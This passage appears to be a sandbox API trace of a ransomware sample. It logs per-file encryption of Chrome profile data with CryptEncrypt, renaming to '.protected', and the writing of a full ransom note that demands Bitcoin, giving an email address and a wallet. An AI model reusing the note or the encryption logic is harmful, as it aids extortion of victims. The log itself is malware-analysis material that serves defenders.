Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\lock"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOCK.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\lock.protected")) returned 1 [0084.176] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.176] lstrcmpiW (lpString1="LOG", lpString2="Windows") returned -1 [0084.176] lstrcmpiW (lpString1="LOG", lpString2="Program Files") returned -1 [0084.176] lstrcmpiW (lpString1="LOG", lpString2="Program Files (x86)") returned -1 [0084.176] lstrcmpiW (lpString1="LOG", lpString2="$Recycle.bin") returned 1 [0084.176] lstrcmpiW (lpString1="LOG", lpString2="System Volume Information") returned -1 [0084.176] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG") returned 141 [0084.176] StrStrIW (lpFirst="LOG", lpSrch=".protected") returned 0x0 [0084.176] lstrcmpW (lpString1="LOG", lpString2="RESTORE_FILES.txt") returned -1 [0084.176] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.176] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG") returned 141 [0084.176] StrStrW (lpFirst="LOG", lpSrch=".txt") returned 0x0 [0084.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG") returned 141 [0084.176] StrStrW (lpFirst="LOG", lpSrch=".rar") returned 0x0 [0084.176] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG") returned 141 [0084.176] StrStrW (lpFirst="LOG", lpSrch=".zip") returned 0x0 [0084.176] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0xc4, lpOverlapped=0x0) returned 1 [0084.177] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffff3c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.177] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0xc4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0xc4, lpOverlapped=0x0) returned 1 [0084.178] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.178] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.178] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.178] CloseHandle (hObject=0x15c) returned 1 [0084.178] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.protected") returned 151 [0084.178] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\LOG.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\log.protected")) returned 1 [0084.179] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0084.179] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Windows") returned -1 [0084.179] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files") returned -1 [0084.179] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files (x86)") returned -1 [0084.179] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="$Recycle.bin") returned 1 [0084.179] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="System Volume Information") returned -1 [0084.179] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001") returned 153 [0084.179] StrStrIW (lpFirst="MANIFEST-000001", lpSrch=".protected") returned 0x0 [0084.179] lstrcmpW (lpString1="MANIFEST-000001", lpString2="RESTORE_FILES.txt") returned -1 [0084.179] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e01c | out: pbBuffer=0x295e01c) returned 1 [0084.179] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e044*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e044*=0x30) returned 1 [0084.179] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0084.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001") returned 153 [0084.179] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".txt") returned 0x0 [0084.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001") returned 153 [0084.179] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".rar") returned 0x0 [0084.179] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001") returned 153 [0084.179] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".zip") returned 0x0 [0084.179] ReadFile (in: hFile=0x15c, lpBuffer=0x4a2460, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesRead=0x295e064*=0x29, lpOverlapped=0x0) returned 1 [0084.180] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffffd7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.180] WriteFile (in: hFile=0x15c, lpBuffer=0x4a2460*, nNumberOfBytesToWrite=0x29, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x4a2460*, lpNumberOfBytesWritten=0x295e064*=0x29, lpOverlapped=0x0) returned 1 [0084.180] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.181] WriteFile (in: hFile=0x15c, lpBuffer=0x295e03c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x295e03c*, lpNumberOfBytesWritten=0x295e064*=0x4, lpOverlapped=0x0) returned 1 [0084.181] WriteFile (in: hFile=0x15c, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e064*=0x30, lpOverlapped=0x0) returned 1 [0084.181] CloseHandle (hObject=0x15c) returned 1 [0084.181] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001.protected") returned 163 [0084.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\MANIFEST-000001.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\manifest-000001.protected")) returned 1 [0084.181] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0084.181] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0084.182] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\RESTORE_FILES.txt") returned 155 [0084.182] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.182] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.182] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0084.183] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.183] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0084.183] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.183] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0084.183] CloseHandle (hObject=0x158) returned 1 [0084.184] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0 [0084.184] FindClose (in: hFindFile=0x47bb10 | out: hFindFile=0x47bb10) returned 1 [0084.184] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\RESTORE_FILES.txt") returned 122 [0084.184] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Extension Settings\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local extension settings\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.184] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.184] WriteFile (in: hFile=0x154, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e2d4*=0x53d, lpOverlapped=0x0) returned 1 [0084.185] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.185] WriteFile (in: hFile=0x154, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0084.185] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.185] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0084.185] CloseHandle (hObject=0x154) returned 1 [0084.186] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.186] lstrcmpiW (lpString1="Local Storage", lpString2="Windows") returned -1 [0084.186] lstrcmpiW (lpString1="Local Storage", lpString2="Program Files") returned -1 [0084.186] lstrcmpiW (lpString1="Local Storage", lpString2="Program Files (x86)") returned -1 [0084.186] lstrcmpiW (lpString1="Local Storage", lpString2="$Recycle.bin") returned 1 [0084.186] lstrcmpiW (lpString1="Local Storage", lpString2="System Volume Information") returned -1 [0084.186] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage") returned 93 [0084.186] lstrcmpW (lpString1="Local Storage", lpString2=".") returned 1 [0084.186] lstrcmpW (lpString1="Local Storage", lpString2="..") returned 1 [0084.186] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\*") returned 95 [0084.186] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0084.199] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.199] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0084.199] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.199] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.199] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.199] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\.") returned 95 [0084.199] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.199] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.199] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.199] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.199] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.199] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.199] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.199] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\..") returned 96 [0084.199] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.199] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.199] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0084.199] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpString2="Windows") returned -1 [0084.199] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpString2="Program Files") returned -1 [0084.199] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpString2="Program Files (x86)") returned -1 [0084.199] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpString2="$Recycle.bin") returned 1 [0084.199] lstrcmpiW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpString2="System Volume Information") returned -1 [0084.199] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage") returned 158 [0084.199] StrStrIW (lpFirst="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpSrch=".protected") returned 0x0 [0084.199] lstrcmpW (lpString1="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpString2="RESTORE_FILES.txt") returned -1 [0084.199] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0084.199] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0084.199] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\local storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0084.200] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage") returned 158 [0084.200] StrStrW (lpFirst="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpSrch=".txt") returned 0x0 [0084.200] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage") returned 158 [0084.200] StrStrW (lpFirst="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpSrch=".rar") returned 0x0 [0084.200] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage") returned 158 [0084.200] StrStrW (lpFirst="chrome-extension_pkedcjkdefgpdelpbcmbmeomcjbeemfm_0.localstorage", lpSrch=".zip") returned 0x0 [0084.200] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x2800, lpOverlapped=0x0) returned 1 [0084.205] SetFilePointerEx (in: 